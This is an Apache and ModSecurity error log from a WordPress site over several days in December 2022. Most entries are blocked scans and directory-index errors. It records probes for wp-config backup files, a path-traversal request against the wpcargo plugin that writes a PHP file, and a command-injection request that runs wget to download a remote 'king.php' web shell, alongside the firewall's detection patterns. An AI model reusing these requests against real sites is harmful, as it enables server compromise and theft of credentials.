.vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.backup"] [unique_id "Y6TCYTUZE7-IhLMACxhVmwAAABQ"] [Thu Dec 22 15:47:29.774480 2022] [:error] [pid 23931:tid 140002746906368] [client 3.21.102.102:48308] [client 3.21.102.102] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.bak"] [unique_id "Y6TCYbvDkTPej3O-tUk8mAAAAE8"] [Thu Dec 22 15:47:30.646574 2022] [:error] [pid 23930:tid 140002738513664] [client 3.21.102.102:48312] [client 3.21.102.102] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".cfg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.cfg"] [unique_id "Y6TCYjUZE7-IhLMACxhVnAAAABA"] [Thu Dec 22 15:47:30.670002 2022] [:error] [pid 23932:tid 140002934179584] [client 3.21.102.102:48314] [client 3.21.102.102] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.conf"] [unique_id "Y6TCYpNVySjTxIl5r9i5TgAAAIE"] [Thu Dec 22 15:47:33.773646 2022] [:error] [pid 23932:tid 140002772084480] [client 3.21.102.102:48328] [client 3.21.102.102] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".inc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.inc"] [unique_id "Y6TCZZNVySjTxIl5r9i5TwAAAIw"] [Thu Dec 22 15:47:34.408135 2022] [:error] [pid 24539:tid 140002679764736] [client 3.21.102.102:48332] [client 3.21.102.102] ModSecurity: Access denied with code 403 (phase 2). String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_30_http_policy.conf"] [line "88"] [id "960035"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "investigacionperu.com"] [uri "/wp-config.old"] [unique_id "Y6TCZqeq-NPHNa2mX-aX2gAAANc"] [Thu Dec 22 16:28:16.692261 2022] [autoindex:error] [pid 24801:tid 140002746906368] [client 43.153.17.177:35288] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Thu Dec 22 17:11:32.379238 2022] [autoindex:error] [pid 24802:tid 140002730120960] [client 162.210.96.7:36768] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Decode/HTML/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/Decode/HTML/index.php [Thu Dec 22 17:12:52.161450 2022] [autoindex:error] [pid 24801:tid 140002671372032] [client 91.134.248.245:36832] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Thu Dec 22 18:38:15.840001 2022] [autoindex:error] [pid 24802:tid 140002934179584] [client 204.197.247.109:39292] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Net/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/Net/index.php [Thu Dec 22 19:30:14.352263 2022] [autoindex:error] [pid 24963:tid 140002788869888] [client 157.7.105.171:40942] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Thu Dec 22 20:42:54.051327 2022] [autoindex:error] [pid 24963:tid 140002780477184] [client 207.174.214.239:42426] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Cookie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/Requests/Cookie/index.php [Thu Dec 22 22:56:36.885606 2022] [autoindex:error] [pid 24963:tid 140002839226112] [client 45.32.87.238:45682] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Fri Dec 23 01:29:46.902086 2022] [:error] [pid 24800:tid 140002942572288] [client 210.5.50.7:49728] [client 210.5.50.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS:sfilecontent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/PHP_INJECTION"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A6"] [tag "PCI/6.5.2"] [tag "WASCTC/WASC-25"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE4"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-22.php"] [unique_id "Y6VK2t6Of8mKRsiAuBkzGgAAAAA"] [Fri Dec 23 07:52:17.135970 2022] [autoindex:error] [pid 10980:tid 140260302366464] [client 43.130.68.161:32982] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Dec 23 08:04:53.725319 2022] [autoindex:error] [pid 10983:tid 140260184868608] [client 192.227.155.193:33400] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Fri Dec 23 08:15:26.757176 2022] [autoindex:error] [pid 10983:tid 140260302366464] [client 43.153.107.236:33620] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Dec 23 14:55:41.763375 2022] [autoindex:error] [pid 28362:tid 140260327544576] [client 91.134.248.211:41684] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/rss/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/blocks/rss/index.php [Fri Dec 23 16:49:23.495435 2022] [autoindex:error] [pid 28570:tid 140260201654016] [client 46.235.42.158:43946] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/video/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/blocks/video/index.php [Fri Dec 23 17:51:15.938346 2022] [autoindex:error] [pid 28364:tid 140260327544576] [client 43.139.0.191:45078] AH01276: Cannot serve directory /home/investig/public_html/wp-content/upgrade/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/upgrade/index.php [Fri Dec 23 19:18:16.288765 2022] [autoindex:error] [pid 18063:tid 140260268795648] [client 132.148.97.23:46800] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/paragraph/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/blocks/paragraph/index.php [Fri Dec 23 19:18:18.503457 2022] [autoindex:error] [pid 18185:tid 140260344329984] [client 132.148.97.23:46804] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/paragraph/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/blocks/paragraph/index.php [Fri Dec 23 22:43:49.597447 2022] [autoindex:error] [pid 18311:tid 140260193261312] [client 143.198.99.255:50644] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/certificates/index.php [Sat Dec 24 00:58:25.105135 2022] [:error] [pid 18185:tid 140260439717632] [client 5.78.57.127:52698] [client 5.78.57.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y6aVATvhLyBJJ4IAHdU_5gAAAMI"], referer: www.google.com [Sat Dec 24 00:58:25.473000 2022] [:error] [pid 18064:tid 140260456503040] [client 5.78.57.127:52700] [client 5.78.57.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y6aVAUnzpgUoo4Zdvk2_NgAAAEA"], referer: www.google.com [Sat Dec 24 01:02:54.358804 2022] [:error] [pid 18185:tid 140260327544576] [client 5.78.57.127:52872] [client 5.78.57.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y6aWDjvhLyBJJ4IAHdU_8QAAAMc"], referer: www.google.com [Sat Dec 24 01:02:54.720567 2022] [:error] [pid 18185:tid 140260193261312] [client 5.78.57.127:52874] [client 5.78.57.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y6aWDjvhLyBJJ4IAHdU_8gAAANc"], referer: www.google.com [Sat Dec 24 01:18:57.977895 2022] [:error] [pid 18185:tid 140260268795648] [client 5.78.57.127:53320] [client 5.78.57.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i)(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)|u(?:221[56]|002f)|%32(?:%46|F)|e0%80%af|1u|5c)|\\\\/))(?:%(?:2(?:(?:52)?e|%45)|(?:e0%8|c)0%ae|u(?:002e|2024)|%32(?:%45|E))|\\\\.){2}(?:\\\\x5c|(?:%(?:2(?:5(?:2f|5c)|%46|f)|c(?:0%(?:9v|af)|1%1c)| ..." at REQUEST_URI. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_42_tight_security.conf"] [line "20"] [id "950103"] [rev "2"] [msg "Path Traversal Attack"] [data "Matched Data: /../ found within REQUEST_URI: /wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "7"] [tag "OWASP_CRS/WEB_ATTACK/DIR_TRAVERSAL"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/wpcargo/includes/barcode.php"] [unique_id "Y6aZ0TvhLyBJJ4IAHdVAIQAAAM4"], referer: www.google.com [Sat Dec 24 01:18:58.402180 2022] [:error] [pid 18064:tid 140260184868608] [client 5.78.57.127:53322] [client 5.78.57.127] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:2. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:2: wget https:/pst.klgrth.io/paste/e7yx8/raw -O king.php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/x.php"] [unique_id "Y6aZ0knzpgUoo4Zdvk2_VAAAAFg"], referer: www.google.com [Sat Dec 24 03:03:01.249320 2022] [autoindex:error] [pid 18311:tid 140260422932224] [client 108.167.189.76:55268] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Proxy/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/Requests/Proxy/index.php [Sat Dec 24 03:54:26.041082 2022] [autoindex:error] [pid 14594:tid 140666436753152] [client 68.178.220.63:56334] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/Content/Type/index.php [Sat Dec 24 05:39:32.158719 2022] [autoindex:error] [pid 14376:tid 140666571036416] [client 162.244.94.241:58118] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Cache/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/Cache/index.php [Sat Dec 24 06:57:24.185702 2022] [autoindex:error] [pid 14594:tid 140666562643712] [client 107.178.100.138:59464] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/latest-comments/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/blocks/latest-comments/index.php [Sat Dec 24 07:23:45.581368 2022] [autoindex:error] [pid 14594:tid 140666596214528] [client 186.202.153.99:59868] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/index.php [Sat Dec 24 07:23:47.731836 2022] [autoindex:error] [pid 14377:tid 140666428360448] [client 186.202.153.99:59872] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/index.php [Sat Dec 24 11:33:32.992700 2022] [autoindex:error] [pid 14594:tid 140666470323968] [client 207.180.208.41:35972] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Sun Dec 25 10:09:38.707617 2022] [autoindex:error] [pid 2180:tid 140578368726784] [client 154.26.129.164:60654] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/customize/: No matching DirectoryIndex 